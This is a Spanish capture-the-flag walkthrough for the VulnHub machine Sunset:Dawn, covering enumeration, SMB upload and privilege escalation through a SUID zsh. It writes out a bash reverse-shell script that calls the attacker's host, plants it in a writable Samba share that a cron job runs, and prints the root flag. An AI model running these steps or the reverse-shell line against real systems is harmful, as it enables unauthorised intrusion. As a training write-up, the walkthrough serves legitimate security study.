[VULNHUB] Sunset:Dawn

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Dawn. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-dawn,341/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.29 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-01 10:29 CEST Nmap scan report for 192.168.1.29 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.15-MariaDB-1 | Thread ID: 14 | Capabilities flags: 63486 | Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsTransactions, Speaks41ProtocolOld, Speaks41ProtocolNew, ODBCClient, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Support41Auth, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults | Status: Autocommit | Salt: \qEEgYh|X#Cf[tX:V&We |_ Auth Plugin Name: 96 Service Info: Host: DAWN Host script results: |_clock-skew: mean: 1h39m39s, deviation: 2h18m34s, median: 19m38s |_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: dawn | NetBIOS computer name: DAWN\x00 | Domain name: dawn | FQDN: dawn.dawn |_ System time: 2020-09-01T04:49:14-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-01 10:49:14 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.85 seconds
    Exploramos un poco mas el puerto 80 para ver si encontramos algun directorio interesante.
    ~ > gobuster -u http://192.168.1.29 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://192.168.1.29/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2020/09/01 10:30:38 Starting gobuster ===================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /logs (Status: 301) /server-status (Status: 403) ===================================================== 2020/09/01 10:30:39 Finished =====================================================
    Vemos que hay un directorio llamado logs. Accedemos a el: http://192.168.1.29/logs/ Hay varios ficheros .log, nos descargamos el management.log Le echamos un vistazo.
    --SNIP-- 2020/09/01 04:48:01 CMD: UID=0 PID=844 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 2020/09/01 04:48:01 CMD: UID=0 PID=851 | /usr/sbin/CRON -f 2020/09/01 04:48:01 CMD: UID=0 PID=850 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 2020/09/01 04:48:01 CMD: UID=0 PID=849 | /bin/sh -c /home/ganimedes/phobos 2020/09/01 04:48:01 CMD: UID=0 PID=848 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 2020/09/01 04:48:01 CMD: UID=33 PID=853 | /bin/sh -c /home/dawn/ITDEPT/web-control 2020/09/01 04:48:01 CMD: UID=1000 PID=852 | /bin/sh -c /home/dawn/ITDEPT/product-control --SNIP
    Podemos ver, que se ejecutan scripts llamados web-control y product-control que estan dentro de una carpeta llamada ITDEPT. En el escaneo inicial vimos que Samba estaba abierto, con lo cual le echamos un vistazo.
    ~ > smbclient -L 192.168.1.29 Enter WORKGROUP\sml's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY. IPC$ IPC IPC Service (Samba 4.9.5-Debian) Reconnecting with SMB1 for workgroup listing. Server Comment --------- -------
    Vemos que hay una carpeta llamada ITDEPT (como la que aparece en management.log). La vemos...
    ~ > smbclient \\\\192.168.1.29\\ITDEPT Enter WORKGROUP\sml's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Aug 3 05:23:20 2019 .. D 0 Sat Aug 3 05:21:39 2019 7158264 blocks of size 1024. 3500864 blocks available smb: \>
    Parece que no hay nada dentro. Vamos a crear los ficheros product-control y web-control que contendran un comando para facilitarnos una reverse shell si se ejecutan. Lo subiremos a la carpeta ITDEPT y esperaremos...
  • Low Shell
  • ~ > nano product-control ~ > cp product-control web-control 21s ~ > cat product-control #!/bin/bash bash -i >& /dev/tcp/192.168.1.59/7777 0>&1
    Los subimos a la carpeta ITDEPT.
    ~ > smbclient \\\\192.168.1.29\\ITDEPT Unable to initialize messaging context Enter WORKGROUP\sml's password: Try "help" to get a list of possible commands. smb: \> put web-control putting file web-control as \web-control (6,0 kb/s) (average 6,0 kb/s) smb: \> put product-control putting file product-control as \product-control (13,4 kb/s) (average 8,3 kb/s) smb: \> ls . D 0 Tue Sep 1 11:05:38 2020 .. D 0 Sat Aug 3 05:21:39 2019 web-control A 55 Tue Sep 1 11:05:32 2020 product-control A 55 Tue Sep 1 11:05:38 2020 7158264 blocks of size 1024. 3500820 blocks available smb: \>
    Ponemos nc a la escucha.
    ~ > nc -nlvp 7777 listening on [any] 7777 ...
    Y tras un rato...
    ~ > nc -nlvp 7777 listening on [any] 7777 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.29] 44558 bash: cannot set terminal process group (1241): Inappropriate ioctl for device bash: no job control in this shell www-data@dawn:~$
  • Privilege Escalation
  • Ahora que estamos dentro del sistema, miramos los ficheros SUID.
    www-data@dawn:~$ python -c 'import pty;pty.spawn("/bin/bash")' www-data@dawn:~$ find / -perm -4000 2>/dev/null /usr/sbin/mount.cifs /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/bin/su /usr/bin/newgrp /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/bin/mount /usr/bin/zsh /usr/bin/gpasswd /usr/bin/chsh /usr/bin/umount /usr/bin/chfn /home/dawn/ITDEPT
    Vemos que esta zsh con SUID... el cual nos permitira elevar privilegios. Lo ejecutamos.
    www-data@dawn:~$ /usr/bin/zsh /usr/bin/zsh #id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) #
  • root.txt
  • Por ultimo, miramos la flag de root :)
    dawn# cd /root #ls flag.txt pspy64 #cat flag.txt Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box! flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
  • End
  • Y con esto ya seriamos root de la maquina.